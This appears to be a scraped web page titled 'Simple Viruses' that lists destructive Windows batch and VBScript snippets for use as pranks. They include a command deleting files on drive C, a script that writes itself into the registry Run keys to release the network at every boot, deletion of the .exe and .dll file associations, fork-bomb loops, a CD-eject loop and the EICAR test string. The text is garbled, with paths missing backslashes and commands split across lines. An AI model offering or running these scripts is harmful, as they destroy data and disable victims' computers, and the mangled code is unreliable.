Simple Viruses
Simple Viruses
Contents [ show ]
@Echo off
Del C: *.* |y
Set oWMP =
CreateObject(“WMPlayer.OCX.7”)
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count – 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count – 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 5000
loop
Creating a Harmless Cdrom Virus
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-
STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
Create a Virus To Test Your Antivirus
@Echo off
Ipconfig /release
@echo off
color 02
:start
echo %random% %random% %random%
%random% %random% %random%
%random% %random% %random%
%random%
goto start
Matrix Type screen
6. Shutdown virus
Shutdown virus
Shutdown virus
echo @echo
off>c:windowswimn32.bat
echo break off>c:windowswimn32.bat
echo
ipconfig/release_all>c:windowswimn3
2.bat
echo end>c:windowswimn32.batreg
add
hkey_local_machinesoftwaremicrosoft
windowscurrentversionrun /v
WINDOWsAPI /t reg_sz /d
c:windowswimn32.bat /freg add
hkey_current_usersoftwaremicrosoftw
indowscurrentversionrun /v
CONTROLexit /t reg_sz /d
c:windowswimn32.bat /fecho You
Have Been HACKED!
PAUSE
#2 Endless Notepads
@ECHO off
:top
START %SystemRoot%\system32
\notepad.exe
GOTO top
#3 Endless Enter
Set wshShell =
wscript.CreateObject(”WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “~(enter)”
loop
#4 Delete Key Registry Files
@ECHO OFF
START reg delete HKCR/.exe
START reg delete HKCR/.dll
START reg delete HKCR/*
:MESSAGE
ECHO Your PC has been crashed.Your
Dad.
GOTO MESSAGE
#5 App Bomber
start winword
start mspaint
start notepad
start write
start cmd
start explorer
start control
start calc
goto x